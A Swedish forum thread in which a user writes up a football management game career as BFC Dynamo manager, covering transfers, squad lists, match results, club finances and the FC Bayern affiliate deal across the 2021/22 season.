SERIEFÖRÄNDRINGAR : : : När varje fotbollssäsong går i mål är det alltid något lags drömmar som går i uppfyllelse. Något lag vinner en titel och ett annat säkrar en efterlängtad uppflyttning. Detta samtidigt som andra lag får se sina öden beseglade och tvingas inse faktum att man nästa säsong tvingas ner en serie. Från den nordöstra Regionalligan kan vi konstatera att jojo-laget Chemnitz tar steget upp till 3. Liga igen medan klassikerlagen Lokomotive Leipzig och TeBe Berlin tillsammans med Bischofswerda tvingas spela i Oberliga nästa säsong. Ny bekantskaper för oss blir istället Rot-Weiss Erfurt och Torgelower FC Greif som flyttas upp samt FC Magdeburg och FSV Zwickau flyttas ner från 3. Liga. Synd att det är två gamla öst-lag som faller ned till Regionalliga! Noterbart inför kommande säsong är nålsögat upp till 3. Liga som blir ännu mindre för vår del. Eftersom det är fem seriesegrare som slåss om fyra uppflyttningsplatser till 3. Liga roterar en kvalfunktion som innefattar två regionala serier varje säsong. Detta innebär att seriesegrarna i Regionalliga Nordost och Nord tvingas göra upp om den sista uppflyttningsplatsen säsongen 2021/2022.

FC BAYERN : : : Det bayerska samarbetet innebar inte under säsongen något ögonblickligt lyft för oss vare sig ekonomiskt eller spelarmässigt. Vi ser dock fram mot starka 884 893 kronor in på kontot till nästa säsong. Alla D-mark behövs! Jag hoppas också vi kan se några spännande lån från FC Bayern till oss vad det lider.

DIE RECHENSCHAFT : : : Pengarna är slut. Östmarken har sinat. Ja, faktum är att BFC:s ekonomi är exakta samma ekonomiska råttbo som Östtysklands. Efter en förlust på drygt åtta miljoner kronor efter säsongsavslutningen har vi för tillfället ett negativt saldo på 4 867 058 kronor. Vi har alltså inte en sekin, inte en östmark, inte en euro på banken. Klubbens ekonomiska situation är så allvarlig att även om vi avlutade alla spelarkontrakt hade vi gått med en miljon i förlust förra säsongen och detta trots att vi, med god marginal, låg på rätt sida om lönebudgeten. Hur ska vi lösa detta? Vi har valt att inte förlänga med en hel del bra spelare som helt enkelt är för dyra. Vi har sålt det vi kunnat. Vi har skrivit kontrakt helt utan bonusmöjligheter. Vi letar efter en till huvudklubb jämte FC Bayern och vi har stramat åt lönebudgeten med 25%. Kommer det räcka? Svaret på den frågan är med största sannolikhet nej. Om inget överraskande händer, om vi inte kan börja producera egna spelare och sälja vidare, ja då kommer Berliner Fussball Club Dynamo snart vara historia men på något sätt känner Jürgen Sparwasser och hela ledarstaben att detta kommer bli en härlig utmaning. På något märkligt vis… Degen och bollarna måste in, följ med in på nästa kapitel i historien om BFC Dynamo.

FÖRLÄNGNINGAR : : : I skuggan av den ekonomiska krisen har vi ändå förlängt kontraktet med en del spelare. En annan del tackar vi för visat intresse. Nedan följer en sammanställning av Sparwassers agerande innan transferfönstret öppnar.

FÖRLÄNGDA AVTAL:

RONNY GARBUSCHEWSKI | 35 ÅR | MITTELFELDSPIELER | 2023 | SEK 45 000
PHILIP SCHULZ | 28 ÅR | MITTELFELDSPIELER | 2023 | SEK 41 000
JOEY BREITFELD | 24 ÅR | MITTELFELDSPIELER | 2023 | SEK 38 000
MORITZ KRETZER | 23 ÅR | MITTELFELDSPIELER | 2023 | SEK 9 250
KEVIN SOMMER | 31 ÅR | TORWART | 2025 | SEK 23 000
MICHAEL BLUM | 32 ÅR | VERTEIDIGER | 2024 | SEK 43 000
MATTHIAS STEINBORN | 32 ÅR | STÜRMER | 2024 | SEK 52 500
DAMIAN SCHOBERT | 22 ÅR | TORWART | 2024 | SEK 43 000
JONAS ZICKERT | 23 ÅR | VERTEIDIGER | 2024 | SEK 50 000

EJ FÖRLÄNGDA AVTAL:

TYSON RICHTER | 20 ÅR | MITTELFELDSPIELER
EROLIND KRASNIQI | 21 ÅR | MITTELFELDSPIELER | LÅN AVSLUTAS
WILL SIAKAM | 25 ÅR | MITTELFELDSPIELER
ALEXANDER SIEBECK | 27 ÅR | MITTELFELDSPIELER
CHRIS REHER | 27 ÅR | VERTEIDIGER
ANDOR BOLYKI | 26 ÅR | MITTELFELDSPIELER
KAI DRUSCHKY | 28 ÅR | STÜRMER
ANDREAS POLLASCH | 28 ÅR | VERTEIDIGER
MARCEL STUTTER | 33 ÅR | STÜRMER
MARTIN FENIN | 34 ÅR | STÜRMER
JAN PENC | 38 ÅR | VERTEIDIGER
CHRISTOFF REIMANN | 37 ÅR | ASS. MANAGER
ADRIAN MARKLOWSKI | 37 ÅR | FYSIO


   
raca14 reacted
SvaraCitera
Arne Hegerfors
(@arne-hegerfors)
Active Member
Blev medlem: 4 år sedan
Inlägg: 16
Topic starter  

KOKA SOPPA PÅ EN SPIK
Transfersommaren 2021

TRANSFERSOMMAREN : : : Medan EM-slutspelet 2020 avgjordes ett år senare än planerat skulle även Jürgen Sparwasser gå igenom sin första transfersommar som manager i BFC Dynamo. Som sagt var det ett skuldtyngt och ekonomiskt utsatt BFC som skulle försöka bygga om, bygga nytt och bygga rätt. Tilläggas ska också att uppehållet mellan säsongerna 2020/21 och 2021/22 är mycket kort. Knappt två månader mellan säsongsavslutningen och seriepremiären gjorde ekvationen ännu svårare Sparwasser och hans stab som tvingas koka soppa på den berömda spiken.

IN:

 MORITZ HARTMANN | 35 ÅR | ASS. MANAGER | 2022 | SEK 35 000 | FRI TRANSFER
“Den första signing vi genomförde var kanske också vår viktigaste. Ersättare till Christof Reimann och Sparwassers nya högra hand är bayraren Moritz Hartmann. Uppdraget blir Hartmanns första som ledare efter att ha avslutat sin aktiva karriär 2020 med att falla ur 3. Liga med Fortuna Köln.”

SALIMO SYLLA | 27 ÅR | VERTEIDIGER | 2022 | SEK 16 000 | R.E. VIRTON
“Skicklig ytterback med fina attribut som rekommenderas av scouten Mbo Mpenza när han kom till klubben. Född i Frankrike men har valt att representera Guinea utan att någon gång ha spelat i landet eller för landslaget. Värderas till 1 050 000 kronor så en möjlig försäljning skulle kunna bli aktuell av ren ekonomiska intressen. Ansluter på fri transfer”

TIM BÖHMER | 19 ÅR | VERTEIDIGER | 2023 | SEK 24 000 | BORUSSIA DORTMUND II
“Ung mittback som vi tidigt fick upp ögonen för. Bra fart, bra på huvudet men framförallt bra utvecklingspotential. Född i Berlin men har fostrats i Borussia Dortmund från vilka han ansluter gratis. Ska skolas in i startelvan tillsammans med andra mittbacksförvärvet Lukas Gerlspeck.”

FLORIAN BOHNERT | 23 ÅR | MITTELFELDSPIELER | 2024 | SEK 41 000 | FSV MAINZ II
“Offensiv ytter som inte bara kan spela på båda kanterna utan även som central anfallare. 17 a-landskamper och ett mål för Luxemburg. Förväntas starta ute till vänster.”

LUKAS GERLSPECK | 22 ÅR | VERTEIDIGER | 2024 | SEK 37 000 | FC AUGSBURG II
“Mittback som tillsammans med Böhmer ska axla manteln i mittlåset. Vi sätter stor tilltro till även Gerlspeck och hoppas att han kan växa och blomma ut i BFC:s tröja. Bayrare och fostrad i Ingolstadt.”

MAX SCHREIBER | 18 ÅR | TORWART | 2023 | SEK 6 000 | BORUSSIA MÖNCHENGLADBACH
“Schreiber deklarerades tidigt skulle släppas från Mönchengladbachs organisation och togs därför in på provspel. Ett provspel han visade framfötterna på och med en mycket låg lön plockas han in på Sommers bekostnad som därmed säljs vidare.”

LUIS KLEIN | 18 ÅR | MITTELFELDSPIELER | KONTRAKTSLÖS | RB LEIPZIG
“Även Klein kom på provspel då det stod klart att Leipzig inte ville ha honom kvar. Inget namn för startelvan men mot en låg ersättning kan han användas på bänken i avlastningssyfte.”

LUCA WESEMANN | 18 ÅR | MITTELFELDSPIELER | 2024 | SEK 21 000 | BAYER 04 LEVERKUSEN
“Wesemann kommer in från Leverkusen som alternativ på positionen som offensiv yttermittfältare. Behärskar spel på bägge långsidorna av planen och även som forward.”

CARL ZSCHIESCHE | 15 ÅR | MITTELFELDSPIELER | 2023 | SEK 1 300 | BFC U19
“Den största talangen i det senaste intaget till ungdomsorganisationen. Har fina attribut och kan faktiskt komma in och bidra på denna nivå redan under säsongen som kommer. Vi sätter stor tilltro till Carl och hans framtida prestationer. Dock är han för ung för att få spela från start eftersom man måste vara 16 år fyllda för att spela i Regionalliga. Från och med 18 september kommer han kunna leverera även på planen.”

JACOB JANSEN | 19 ÅR | MITTELFELDSPIELER | 2024 | SEK 20 000 | 1. FC KÖLN
“I grunden anfallare men av oss betraktad som offensiv mittfältare. Fina, fina attribut i skicklighetskategorierna med vilka han är planerad att virvla fram på ena kanten. Vi hoppas kunna få ut mycket av Jansen i offensiven.”

MARVIN WIEß | 19 ÅR | MITTELFELDSPIELER | 2024 | SEK 21 000 | TSG 1899 HOFFENHEIM II
“I och med att vi fick en vakans på positionen som central offensiv mittfältare och tillika spelfördelare krävdes ett nyförvärv och då hittade vi 19-årige Weiß. Född i Bayern, på gränsen till det gamla Östtyskland i staden Coburg. Bra finess på denna kille som vi hoppas han kan utnyttja som länk mellan defensiv och offensiv.”

MAX GRUNDMANN | 22 ÅR | VERTEIDIGER | 2022 | SEK 19 000 | BRANDENBURG SC SÜD 05
“Återvänder till klubben efter en säsong i Brandenburg Süd och Oberliga. Duglig back som plockas in som reserv.”

MAURICE HIRSCH | 28 ÅR | MITTELFELDSPIELER | 2023 | SEK 41 000 | VFB GARTENSTADT
“Hirsch hade egentligen tänkt varva ner och lägga av då han lämnade Mannheim för den lilla klubben Gartenstadt i Baden-Württemberg men suget tycks ha blivit för stort och istället blev det en flytt till huvudstaden. I konkurrens med just Mannheim lyckas vi knyta till oss den defensive mittfältaren med förflutet både i Hannover 96 och Hoffenheim.”

KONSTANTIN ENGEL | 33 ÅR | VERTEIDIGER | 2022 | SEK 12 000 | VFL OSNABRÜCK
“När ytterbacken Engel från 2. Bundesliga dök upp på vår radar tänkte vi att han skulle bli alldeles för dyr för vår budget med med endast 12 000 kronor per månad blev det för svårt att säga nej. Med rutin från Bundesliga, 2. och 3. kommer han bli en tillgång i ett annars oprövat lag.”

UT:

KEVIN SOMMER | 31 ÅR | TORWART | SEK 215 000 | PORDENONE
“När vi gjort klart med ett billigare alternativ bakom Schobert erbjöd vi Sommer till andra klubbar. Till vår stora förvåning fick vi ett bud på 215 000 kronor från Italien och Pordenone. Egentligen oskäligt mycket betalt men en extremt bra affär för oss gör att vi mer än gärna släpper Sommer som tillbringat hela sin karriär i BFC.”

RONNY GARBUSCHEWSKI | 35 ÅR | MITTELFELDSPIELER | SEK 70 000 | FC ROT-WIESS ERFURT
“Som tidigare redogjort för önskade Garbuschewski att flytta från klubben. När nykomlingen Erfurt sedan erbjöd en helt godtagbar summa för Garbuschewski lät vi honom lämna.”


   
raca14 reacted
SvaraCitera
Arne Hegerfors
(@arne-hegerfors)
Active Member
Blev medlem: 4 år sedan
Inlägg: 16
Topic starter  

DIE MANNSCHAFT
Truppen säsongen 2021/2022

Med premiären runt hörnet direkt vid transferfönstrets öppnade gällde det att agera snabbt men oavsett hur snabbt Sparwasser och Hartmann arbetade fick de inte ihop truppen till seriepremiären. I stort var truppen helt klar men några få luckor fanns fortfarande kvar att fylla. De tre spelare som ramlade in sent var Max Grundmann, Maurice Hirsch och Konstantin Engel men dessa har ni redan fått möjlighet att stifta bekantskap med. 

Tråkigare förändringar sedan senast är däremot styrelsens, med nya ordföranden David Bauer i spetsen, beslut att “sälja” vår största talang Carl Zschiesche till slovakiska Dunajska Streda i syfte att stärka ekonomin. Det hade varit helt förståeligt om man inte släppt honom för ynka 2 000 kronor. Stor applåd till herr Bauer, nu ska ni se att ekonomin kommer blomstra...

DIE TORWARTE
Damian Schobert | 22 år | Berlin | 1
Max Schreiber | 18 år | Berlin | 1 | NY!
Kommentar: Vi går in i säsongen med en mycket ung målvaktssida men vi håller inte andan av nervositet för den sakens skull. Schobert, nu ohotad etta, visade under fjolårssäsongen att han är att räkna med och vi ser även att han ska kunna lyfta sitt spel ytterligare några nivåer denna säsong. Bakom honom har vi unge och oprövade Max Schreiber.

DIE VERTEIDIGER
Michael Blum | 32 år | Düsseldorf | 0
Tim Böhmer | 19 år | Berlin | 1 | NY!
Konstantin Engel | 33 år | Qaragandy | 0,5 | NY!
Lukas Gerlspeck | 22 år | Forchheim | 0 | NY!
Max Grundmann | 22 år | Gransee | 1 | NY!
Salimo Sylla | 27 år | Châlons-en-Champagne | 0,5 | NY!
Jonas Zickert | 23 år | Cottbus | 1
Bruno Ivic | 22 år | Osijek | 0,5 | UTLÅNAD!
Kommentar: Många förändringar bland lagets backar. Vi har plockat in ett nytt mittlås i form av unga Tim Böhmer och Lukas Gerlspeck. Dessa två herrar är lovande men vi kommer behöva ge dem tid att spela ihop sig. Särskilt eftersom försäsongen är så kort. Ut på kanterna kommer vi till en början nyttja Salimo Sylla till vänster och Engel och Zickert till höger. Ingen självklar succé defensivt men jag tror på denna lagdel och att de kommer kunna vinna ett par matcher åt oss. Kroatiske Ivic kommer lånas ut till Rostocker FC för att få speltid.

DIE MITTFELDSPIELER
Florian Bohnert | 23 år | Luxemburg | 0 |
NY!
Joey Breitfeld | 24 år | Berlin | 1
Maurice Hirsch | 28 år | Mannheim | 0 | NY!
Jacob Jansen | 19 år | Berlin | 1 | NY!
Luis Klein | 18 år | Berlin | 1 | NY!
Moritz Kretzer | 22 år | Suhl | 1
Philip Schulz | 28 år | Berlin | 1
Marvin Weiß | 19 år | Coburg | 0 | NY!
Luca Wesemann | 18 år | Aachen | 0 | NY!
Valentin Zalli | 20 år | Pristina | 0,5
Kommentar: Mittfältet kommer formeras med två defensiva mittfältare och tre offensiva. De defensiva platserna är vigda åt Philip Schulz, Maurice Hirsch och eventuellt även Jonas Zickert som är uppsatt som back. Vi ska ha i åtanke att Schulz även har kvalitéer som gör honom aktuell för spel som offensiv central spelfördelare. Som offensiv spelfördelare har vi planerat för det unge nyförvärvet Marvin Weiß men även här får vi har i åtanke att han är ung och kommer behöva växa in i rollen. Ute på kanterna kommer ny till stor del använda Florian Bohnert, Joey Breitfeld, Valentin Zalli, Jacob Jansen och Luca Wesemann. Ingen av dessa är på något sätt självskriven så här har vi ett ordentligt frågetecken att ta itu med. Störst potential får Jansen sägas ha.

DIE STÜRMER
Pascal Schoch | 21 år | Berlin | 1
Matthias Steinborn | 31 år | Berlin | 1
Kommentar: Tunnaste lagdelen är helt klart anfallet. Vi har offensiva mittfältare som kan passa i rollen men ovan nämnda herrar är våra renodlade forwards. Steinborn har kvalitéer men hade svårt att komma till skott förra säsongen. Han M Å S T E prestera om det ska bli något alls denna säsongen. Vi går alltså all-in på honom när marknaden var otroligt tunn.

DDR-INDEX 62% : : : En svagare siffra än fjolårets 75% men då ekonomin är överordnad allt annats fick billigare alternativ premieras framför spelare från gamla DDR och Östeuropa. Vårt DDR-index är något vi måste jobba på till nästa år.

(DDR-index: 1 poäng till de spelare som är födda inom det gamla DDR:s gränser, 0,5 poäng åt de spelare som kommer från övrig stater med kommunistisk historia och 0 poäng till de som kommer från alla andra länder. Detta divideras sedan med antalet spelare i truppen för att kunna jämföra över olika säsonger.)


   
SvaraCitera
Arne Hegerfors
(@arne-hegerfors)
Active Member
Blev medlem: 4 år sedan
Inlägg: 16
Topic starter  

OKTOBERREVOLUTIONEN 2021
Första delen av säsongen 2021/2022

REGIONALLIGA NORDOST : : : När århundradets kortaste försäsong knappt hunnit till ända var det dags för avspark säsongen 2021/2022. För Sparwassers och Hartmanns åttondetippade lag väntade svårspelade och topptippade Jena i seriepremiären. Tankarna som snurrade inför avspark var att om vi hade lite tur med oss kunde säsongen ändå bli bra, om taktiken sätter sig skulle vi kunna störa någon av de bästa men att det i ärlighetens namn var som så, att förväntningarna snarare var att vi hade en lång och svår säsong framför oss med stora utmaningar både sportsligt men framförallt ekonomiskt.

Vad händer i premiären? Jo, vi får en smakstart! Vi vinner med 1-0 mot Jena hemma på Friedrich-Ludwig-Jahn-Sportpark och där och då tänds ett litet hopp. En liten strimma ljus om en eventuellt bra säsong som sedan skulle släckas abrupt  och cyniskt i den nästkommande matchen mot nykomlingarna Erfurt.

Efter premiärsegern mot Jena är vi inte särskilt bra. Vi har stora problem i offensiven och med endast två alternativ som stürmer låter vi Steinborn nöta på utan att han får någon utdelning som helst. De enda ljusglimtarna i seriespelet är egentligen matchen mot Cottbus där vi leder med 2-0, tappar till 2-3, för att sedan kvittera i matchens slutskede. Där visar vi att vi ändå har lite kvalité i truppen. Likaså när vi klär av Berliner AK med 4-1 manifesterar vi att även vi kan spela fotboll.

På träningsplanen i Hohenschönhausen nöter vi oförtrutet på det offensiva spelet. Träning efter träning är det offensiva löpningar, taktiska direktiv för den sista tredjedelen och fasta situationer som spelarna drillas i. När poängen, trots den idoga träningen uteblir, uppvisar inte bara spelarna utan hela tränarstaben och organisationen en uppgivenhet och otålighet. Tänk om allt skiter sig? Tänk om vi, med minimalt publikunderlag och röda siffror tvingas ner i Oberliga? Då, då skulle ingenting finnas kvar.

När allt känns som mest uppgivet, efter ännu en misslyckad insats och 0-0 mot Luckenwalde, då kommer vändningen och som den kommer! I oktober 2020 liknades laget vid en sovjetisk pansarvagn på framryckning när vi gjorde rent hus i oktober månad, i år är det en hel brigad med sovjetiska T-34:or som dundrar fram längs Karl-Marx-Allee. Vi vinner alla matcher på att övertygande sätt och det, mot inte vilket motstånd som helst. Både Trabantfabrikanterna från Zwickau och Sparwasser den äldres eget Magdeburg är nedflyttade från 3. Liga och topplag i Regionalliga i år, de trycker vi dit. Vilken månad!

Med stämningen på topp rusar vi in i november och där hinner verkligheten ikapp oss i form av Babelsberg innan vi börjar blanda och ge lite innan bokslut görs för halva säsongen. I Berlins distriktsmästerskap har vi enkelt kvalificerat oss till en kvartsfinal efter segrar mot CFC Hertha och BW Berlin. I kvartsfinalen går vi upp mot ligakonkurrenten Lichtenberg senare i februari. I Landespokal vill styrelsen att vi vinner turneringen får att på så vis kvalificera oss för den ordinarie tyska cupen.

Spoiler
TABELL FÖRSTA HALVAN SÄSONGEN 2021/2022

AKTUELLE KAMERA

DIE MANNSCHAFT : : : Målvaktsspelet var den lagdel vi var mest bekväm med i ingången till säsongen och här har Damian Schobert visat hur bra han är. 18 insläppta mål på 19 spelade matcher i ligan är inte den bästa noteringen men 7,15 i snittbetyg är finfina papper för hans del. Schoberts insatser gör mig lite tudelad, å ena sidan skulle vi kunna sälja honom och dra in en bra slant till klubbkassan men å andra sidan är han otroligt bra och att tappa honom skulle svida något oerhört.

Lukas Gerlspeck och Tim Böhmer i mittlåset då? Jo, där har vi sett två killar som tillsammans vuxit sig allt bättre och pålitligare vad säsongen har lidit. Trots ungdomligt oförnuft ibland är det här två killar som vi är riktigt nöjda med.

Det var i offensiven som vi hade stora problem inledningsvis och de problemen är inte helt bortblåsta ännu. Positivt är att Genosse (östtyska för kamrat) Jacob Jansen visat sig vara en mycket fin ytter när han river upp stora sår i motståndarnas försvarslinjer. Däremot har både Steinborn och Weiß haft svårigheter att komma tillrätta. Steinborn får vi, i brist på alternativ, låtas hållas med viss rotation i form av Luca Wesemann. Weiß å sin sida är mycket ung och när Philip Schulz, vår nye lagkapten, klivit fram och spelat sin livs fotboll kan vi inte tillåta oss att klaga.

DIE RECHENSCHAFT : : : Så till ekonominyheterna. Kanske inte den mest underhållande delen av spelet men det är trots allt en nyckel i saven får därmed föräras med en central del i berättandet. Som vi tidigare rapporterat har vi sänkt lönebudgeten med cirka 25% och lönerna med ungefär lika mycket. Styrelsen har dessutom lyckats skaka fram 1,3 miljoner kronor vid två tillfällen för att täcka de löpande lönekostnaderna. Förutom detta har samarbetet med FC Bayern börjat ge resultat i huvudboken. Utöver den årliga summan på 884 893 kronor som FC Bayern betalar oss för samarbetet har även vi en möjlighet att arrangera en träningsmatch mot dem där alla intäkter går till oss. När spelschema så tillät kofotade vi in en träningsmatch mot jättarna från München och där kunde vi inkassera ytterligare 800 000 kronor när Friedrich-Ludwig-Jahn-Sportpark fylldes till bredden. Välbehövligt! Som om inte detta vore nog tillåter spelschemat oss att spela en träningsturnering i januari. Till denna turnering har vi bjudit in våra gamla trätobröder i Hansa Rostock och Dynamo Dresden tillsammans med det slovakiska lag som, för en spottstyver, köpte vår talang Carl Zschiesche. Då slovakerna ställer upp utan någon deltagaravgift kan vi kalkylera med ytterligare två miljoner kronor när Dynamo-Cup spelar i januari. Till sist har också styrelsen gått med på att inleda samarbete med ytterligare en huvudklubb i rent ekonomiskt syfte. Arbetet pågår och vilken det i slutändan blir får vi återkomma till.


   
SvaraCitera
Arne Hegerfors
(@arne-hegerfors)
Active Member
Blev medlem: 4 år sedan
Inlägg: 16
Topic starter  

SOM EN HIMMELSBLÅ TRABANT
Andra delen av säsongen 2021/2022

REGIONALLIGA NORDOST : : : Vid markeringen för halva säsongen 21/22 hade vi precis förlorat med 2-0 borta mot Lichtenberg. Trots nederlaget såg vi fram fortsättningen eftersom vi spelade allt bättre. Vår positiva framtidstro, den var befogad. Som en himmelsblå Trabant kom vi att cruisa fram genom vintern och våren 2022. Antal segrar, 17. Antal oavgjorda, fem. Antal förlorade matcher, NOLL.

Likt säsongspremiären gör vi en mycket fin match när vi återigen besegrar serieledarna Jena och härifrån går saker och ting bara uppåt. I rask takt besegrar vi Erfurt, Hertha II, Cottbus och Halberstadt utan att någon gång sakta in. Däremellan visar vi även Lichtenberg var skåpet ska stå när vi vänder 0-2 i Landespokals kvartsfinal till seger med 4-2 efter förlängning. En riktigt fin seger som visade vilken enorm karaktär laget besatt. Ungefär kring den här punkten ska vinterns transferfönster stänga. Ligakonkurrenten och nykomlingen Greif slåss i botten av tabellen och ser ett behov av att förbättra sin forwardssida och hör sig då för om vår ständige bänknötare Pascal Schoch. Ett ja tack till Greif för på marknaden har vi i vår tur fått upp ögonen för den väldige forwarden Thierno Thioub. Thioub som är senegales har fostrats i Spartak Moskva och har gått klubblös sedan säsongen i Frankrike och Pau FC tog slut förra våren. Honom plockar vi in för en billig peng.

Därifrån fortsätter vi våren med att skörda segrar som mellan varven blandas med enstaka kryss. Onödiga kryss mot lag som vi egentligen borde besegra. Onödiga kryss som skulle visa sig kostsamma när seriespelet summerades framme i maj. 

I distriktscupen får vi, efter segern mot Lichtenberg, en beskedlig lottning i semifinalen i form av TuS Makkabi Berlin som enkelt städas av med 4-1 vilket medför att seriekonkurrenten Altglienicke var de enda som skulle kunna stoppa oss från att knipa en plats i DFB-Pokal till nästa säsong. I aprils slut och tiderna runt finalen i Berliner Landespokal når säsongen sin kulmen. Inte bara det faktum att vi kör över Altglienicke fullständigt med 4-0 i en final som fullständigt går i våra färger lyckas vi i samtidigt också komma ikapp seriesuveränen Jena i ligaspelet. Under delar av säsongen dessförinnan och utan att släppa greppet hade man lett ligan sedan omgång 24 men här på slutet hade laget från Thüringen fått lite grus i sitt annars väloljade maskineri. 

Med två omgångar kvar är vi tre poäng efter Jena. Ett på förhand enkelt spelschema för serieledarna har underskattats vilket gjort att vi kunnat komma ikapp. I slutomgångarna ska man möta redan degraderade Berliner AK och Meuselwitz som inte hade något att spela för. Vi skulle möta mittenlagen Lichtenberg och just Altglienicke som vi precis tvålat till i distriktsmästerskapets final. Jena visar sig inte ha nerver nog för att säkra seriesegern och en kvalplats till 3. Liga. 2-2 mot Berliner AK och 0-2-förlust mot Meuselwitz borde betytt att vi kunnat sprintat förbi i sista omgången men inte. När finalen vunnits är det som att bensinen är slut i tanken och i “returen” mot Altglienicke får vi inte in bollen. 0-0 slutar matchen och eftersom Jena har en fantastiskt målskillnad skulle en seger i sista omgången ändå inte hade tagit oss upp på förstaplatsen. Någon seger blir det heller inte mot Lichtenberg. 1-1 och säsongen är över för vår del. En ändå förträfflig säsong för vår del och ett storts steg framåt i jakten på en framtida uppflyttning.

Spoiler
TABELL ANDRA HALVAN SÄSONGEN 2021/2022

AKTUELLE KAMERA

DIE MANNSCHAFT : : : Våren 2022 är en period då allt faller på plats för oss. Anfallsspelet med Mathias Steinborn i spetsen är lika giftigt och cyniskt som en KGB-agent på uppdrag. Försvarsspelet under ledning av det dubbelhövdade monstret Gerlspeck-Böhmer är precis så bra som vi bara kunde drömma om inför säsongen. Som grädde på moset, som Spreewaldgurkor på vårt Filinchenknäcke för att prata i DDR-termer, blir Damian Schobert bäst någonsin i Regionalliga Nordost med 20 hållna nollor på en säsongen. 

Utropstecknet från säsongens första halva, Jacob Jansen, har fortsatt att imponera och har nu lockat till sig intresse från klubbar uppe i 2. Bundesliga. Darmstadt, St. Pauli och Karlsruhe märks bland intressenterna. Lika mycket som det vore ett välkommet tillskott i kassan, lika tungt tapp vore det att tappa vår guldklimp på högerkanten som checkar ut på nio mål, åtta assist och ett snittbetyg på 7,05 på 35 spelade ligamatcher.

DIE RECHENSCHAFT : : : Välkomna tillskott rapporterade om senast i och med träningsmatchen mot FC Bayern och sedan Dynamo-Cup i januari. Vinsten i Berliner Landespokal medförde en oväntad men tacksam intäkt på 343 000 kronor. Beträffande försöket att hitta ytterligare en samarbetsklubb har styrelseordförande Daniel Bauer misslyckats överraskande mycket. På de första fyra försöken lyckas styrelsen inte hitta något förslag överhuvudtaget. När man den femte gången återkom med de tre alternativen Bayer Leverkusen, Mainz och Fortuna Düsseldorf skulle ett ja till något av dessa förslag innebära att avtalet med FC Bayern sades upp med omedelbar verkan. Därmed var ingenting intressant eftersom deras årliga avgifter understeg FC Bayerns med stor differens.


   
SvaraCitera
Arne Hegerfors
(@arne-hegerfors)
Active Member
Blev medlem: 4 år sedan
Inlägg: 16
Topic starter  

HALLELUJAH, D-MARK!
Säsongsavslutning

PRESTATIONER : : : Hallelujah, hallelujah, hallelujah D-mark! Vi gör en ekonomisk vinst på hela 3 880 556 kronor säsongen 2021/22! Det är smått otroligt hur väl våra ansträngningar för att rädda ekonomin fallit ut. Med 3,8 miljoner plus är vårt negativa saldo i princip uppätet. Även sportsligt gör vi en fantastisk säsong och fastän vi inte nådde någon kvalplats kan vi glädja oss på flera sätt. Vi gör en rekordsäsong placeringsmässigt, inte på 21 år har Berliner Fußball Club Dynamo placerat sig bättre. 2000/01 kom man etta i Tysklands dåvarande fjärde division utan att lyckas nå uppflyttning. Att inte nå uppflyttning är nog ändå bra för klubben eftersom vi inte är redo för det steget ännu. Vi vinner dessutom distriktsmästerskapen och får nästkommande säsong spela i DFB-Pokal. Kul och bra på alla sätt och vis!

Med flera fina prestationer på planen är det svårt att välja ut bara tre för säsongen bästa spelare men vi har plockat ut de tre som ändå stack ut allra mest.

DAMIAN SCHOBERT : : : Vår sista utpost är bäst i laget i år i igen. Han håller nollan i 20 av 37 spelade matcher och frälser oss gång efter annan med otroliga räddningar. Med Schobert i buren har vi chans att vinna alla matcher vi ställer upp i.

LUKAS GERLSPECK : : : Tillsammans med Tim Böhmer gör båda våra mittbackar en otroligt bra säsong.Den ena delen av vårt nya mittlås, Lukas Gerlspeck, sticker ut ännu lite mer av de båda. Kanske borde de två tillsammans tilldelats två stjärnor efter den gångna säsongen men jag väljer att lyfta fram Gerlspeck då han är lite mer mogen, lite mer ansvarstagande i sitt spel.

JACOB JANSEN : : : Vänsteryttern Jansen tilldelas en tredjeplats i skarp konkurrens med Philip Schulz, Tim Böhmer och Mathias Steinborn. Bra tekniskt, bra på huvudet sin läng till trots och bra både i avslutandet och förarbetet. Den billige 19-åringen har tilldragit sig omvärldens blickar.

SALIMO SYLLA : : : Den guineanska ytterbacken kom in i säsongen som förstavalet av tre på vänsterbackspositionen. Vi hade höga förväntningar på honom men när säsongen summeras har inga av de förväntningarna motsvaras och han får se sig passerad både av Michael Blum och 16-årige Hakan Polat på sin position.

SERIEFÖRÄNDRINGAR : : : Ur Regionalliga Nordost åker tre anonyma gäng. Luckenwalde, Rathenow och Berliner AK kommer nästa år tvingas spela i Oberliga. Upp kommer FC Oberlausitz Neugersdorf som i DDR hette BSG Lautex Neugersdorf och således var fotbollsklubben för arbetarna på gummifabriken i Neugersdorf. Tillsammans med dem är TeBe Berlin åter tillbaka i fjärdedivisionen. Ner från 3. Liga kommer Chemnitz, f.d. Karl-Marz-Stadt. Jojo-lag var det ja… Dessa serieförändringar medför att vi bara är 19 lag istället för 20 i den Nordöstra ligan i år. Seriesegraren tvingas återigen till kvalspel för att nå uppflyttning. Bör vara sista säsongen för den Nordöstra ligan eftersom denna funktion flyttar mellan fem fem regionala serierna.

FC BAYERN : : : Inga spelare har lånats ut från FC Bayern till oss ännu. De spelare som är listade för lån menar FC Bayern ska spela i bättre lag än vårt och när jag ber min scout göra en lagrapport på FC Bayerns a-trupp, II-lag och U19-lag får vi inga förslag “eftersom det finns så lite statistik om laget” Är det någon som vet vad detta beror på? Eller är det helt enkelt så att varken finns spelare som FC Bayern vill låna ut eller som vill spela med oss?

DIE RECHENSCHAFT : : : Som sagt, 3,8 miljoner i vinst! Det trodde jag var en omöjlighet när vi i förra säsongsavslutningen skrev att pengarna var slut. Tack vare FC Bayern fick vi ett tillskott på cirka två miljoner kronor. Dynamo-cup genererade i ungefär lika mycket. Utöver detta kapade vi spelarlönerna, fick en del tillskott från styrelsen och höjde vårt publiksnitt. Detta medför att vi gått från minus åtta miljoner i fjol till en vinst på 3,8 i år. Det är en skillnad på nästan 12 miljoner kronor. Bra jobb!

Inför nästa säsongen har vi planer på liknande åtgärder. Vi kommer nog sänka lönerna något och ska spela en del profilstarka träningsmatcher på försäsongen istället för att möta diverse amatörgäng från runt om i Berlin. Till detta kan vi räkna med några spelarförsäljningar.

FÖRLÄNGNINGAR : : : I år ser vi inte lika många utgående kontrakt som efter fjolårssäsongen. En relativt lugn lågsäsong att vänta.

FÖRLÄNGDA AVTAL:

MAX GRUNDMANN | 23 ÅR | VERTEIDIGER | 2024 | SEK 18 000

EJ FÖRLÄNGDA AVTAL:

SALIMO SYLLA | 28 ÅR | VERTEIDIGER
KONSTANTIN ENGEL | 34 ÅR | VERTEIDIGER
NICOLAI KRAMMEL | 33 ÅR | MÅLVAKTSTRÄNARE


   
raca14, Denki and LeoFM reacted
SvaraCitera
Arne Hegerfors
